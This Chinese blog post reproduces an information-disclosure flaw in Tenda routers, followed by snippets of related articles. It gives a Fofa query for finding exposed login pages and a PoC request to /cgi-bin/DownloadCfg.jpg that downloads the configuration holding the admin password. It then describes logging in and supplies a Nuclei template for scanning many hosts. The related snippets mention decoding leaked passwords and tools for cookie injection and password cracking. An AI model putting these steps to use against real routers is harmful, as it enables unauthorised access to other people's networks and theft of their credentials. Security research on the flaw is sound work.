漏洞复现-Tenda 路由器

已于 2023-12-05 15:38:06 修改
阅读量278 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络
于 2023-12-05 10:28:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134800676
版权

漏洞描述


Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。


漏洞复现


1、Fofa
title=”Tenda | LOGIN”

2、界面如下

3、POC
/cgi-bin/DownloadCfg.jpg
4、从配置中查找账户密码(直接打开JPG就行了)

5、成功登录如下

Nucle脚本

id: tenda-router-downloadcfg-infolink

info:
name: Tenda 路由器 DownloadCfg 信息泄露漏洞
author:
severity: high
description: Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。
reference:
- https://
metadata:
fofa-query: title="Tenda | LOGIN"
verified: true
max-request: 1

http:
- raw:
- |
GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"Please")'

免费领取安全学习资料包!

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现Tenda路由器存在密码泄露
失心少年
09-09 819
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。腾达W15E路由器外置4根增强型360°全向天线,苛刻调校到0.01毫米级的零干扰间距,科学独立布局的信号放大器PA,穿墙性能更强劲,覆盖范围更广,在哪都有好信号。1.执行密码泄露的POC,泄露密码在当前文件的sys.userpass=位置,然后base64解码即可使用该明文密码登录路由器后台。
tenda路由器漏洞利用工具
01-20
tenda路由器cookie漏洞利用工具 by supppig
tenda路由器信息泄露查找
dfdhxb995397的博客
01-19 289
本文作者:i春秋作家——icqb32d3a26 1: 前期准备: (1) 路由器固件 一般获取固件的方法有以下几种 官方网站根据对应版本下载(√),点击下载 在点击更新固件时抓取对应的更新固件链接 拆开路由器,找到flash芯片后,通过热风枪取下flash芯片,使用编程器读取 通过uart串口进入路由器调试界面,进行flash的备份 (2) binwalk...
Tenda路由器 信息泄露漏洞复现
12-11 600
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。
腾达无线路由器漏洞攻击与分析
03-19
卷(2014)第
腾达路由器linux开发,Tenda无线路由器远程命令执行后门漏洞
weixin_42376940的博客
05-12 446
发布日期:2013-10-15更新日期:2013-10-19受影响系统:tenda W302Rtenda W330R描述:--------------------------------------------------------------------------------Tenda是深圳的一家网络设备提供商。Tenda的 W330R、W302R无线路由器固件最新版本及Medialink ...
易语言-腾达路由器易语言操作
06-26
腾达路由器源码,做局域网的掌权人。可以增加更多人性化的功能。
腾达路由器怎么设置-腾达路由器设置图文教程.docx
09-27
腾达路由器怎么设置-腾达路由器设置图文教程.docx
Tenda腾达路由器5G信号在哪里? 腾达路由器关闭5G信号的方法
10-01
腾达路由器5G信号与关闭方法】 腾达路由器提供了两种不同频段的无线信号,分别是2.4G和5G。2.4G频段的无线信号具有更广泛的覆盖范围,但可能受到更多干扰,适合对网络速度要求不高的设备使用。而5G频段的无线信号...
腾达路由器怎么恢复出厂设置?2种使Tenda路由器恢复出厂设置的方法介绍
10-01
腾达路由器恢复出厂设置详解】 在日常使用腾达Tenda路由器的过程中,有时由于配置错误或系统异常,可能需要将路由器恢复到出厂设置,以便清除所有个性化配置并重新开始设置。本文将详细介绍两种简单易行的...
腾达路由cookie漏洞利用工具
10-30
基于Tenda路由器漏洞利用 当连接到内网时 可以直接打开工具注入cookie 更改路由器管理员密码
腾达路由器密码破解专家
02-25
腾达路由器密码破解专家 希望大家多多支持!!
Tenda腾达部分路由器固件下载(.bin文件)
08-10
"Tenda腾达部分路由器固件下载"的标题表明这是一个提供腾达路由器固件更新的资源集合。这些固件通常以.bin文件格式提供,这是许多嵌入式系统常用的二进制文件格式,包含可直接加载到路由器内存中的机器指令和配置...
kali+php+缓冲区溢出,CVE-2018-18708:Tenda路由器缓冲区溢出漏洞分析
weixin_30641041的博客
04-13 687
CVE-2018-18708:Tenda路由器缓冲区溢出漏洞分析摘要:本文通过对一个ARM路由器缓冲区溢出漏洞的分析,实践逆向数据流跟踪的思路与方法。假设读者:了解ARM指令集基础知识、了解栈溢出原理和利用方法、了解通过IDA和GDB进行静态分析与动态跟踪的方法。阅读本文后:可以了解逆向数据流跟踪的思路与方法1. 漏洞概要CVE-2018-18708,多款Tenda产品中的httpd存在缓冲区溢出...
路由器漏洞挖掘之栈溢出入门
01-21 1043
前言 MIPS 指令集主要使用在一些嵌入式的 IOT 设备中,比如路由器,摄像头。要对这些设备进行二进制的漏洞挖掘就需要有对 MIPS 有一定的熟悉。MIPS 指令集的栈溢出与 x86 指令集的有所不同,所以漏洞的利用方式也不太相同,但是溢出的思路是一样的:覆盖返回地址、劫持程序控制流、构造 ROP chain 、写 shellcode 等等。本文介绍一下最基本的 MIPS 指令集下的栈溢出的利...
漏洞复现--Tenda路由器DownloadCfg信息泄露
qq_53003652的博客
12-01 732
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。该产品存在信息泄露漏洞,攻击者可获得路由器后台账号密码。密码base64解码。
《解密家用路由器0day漏洞挖掘技术》学习笔记
zxyccm的博客
07-17 1770
家用路由器 漏洞挖掘技术 路由器漏洞
漏洞复现之信息漏洞
zkaqlaoniao的博客
12-04 160
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。4、从配置中查找账户密码(直接打开JPG就行了)
复现Tenda信息泄露漏洞_19
最新发布
fushuang333的博客
01-15 1286
复现Tenda信息泄露漏洞Tenda远端WEB管理是为了在外网(其他网络)可以访问路由器,从而进行管理。
tp-link 腾达路由器桥接
05-05
将 TP-Link 腾达路由器设置为桥接模式需要以下步骤: 1. 连接电脑和 TP-Link 腾达路由器,打开浏览器,输入路由器 IP 地址,登录路由器管理界面。 2. 在左侧菜单栏中选择“网络设置”,然后选择“WAN”。 3. 在 WAN 设置页面中,选择“桥接模式”,然后单击“保存”。 4. 确认弹出框中的提示信息,单击“确定”。 5. 在左侧菜单栏中选择“网络设置”,然后选择“LAN”。 6. 在 LAN 设置页面中,取消“启用 DHCP 服务器”选项。 7. 单击“保存”,然后重启路由器。 完成以上步骤后,TP-Link 腾达路由器就已经设置为桥接模式了。如果您需要使用无线网络,可以将另一个路由器连接到 TP-Link 腾达路由器的 LAN 口上,并在该路由器上设置您需要的无线网络
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值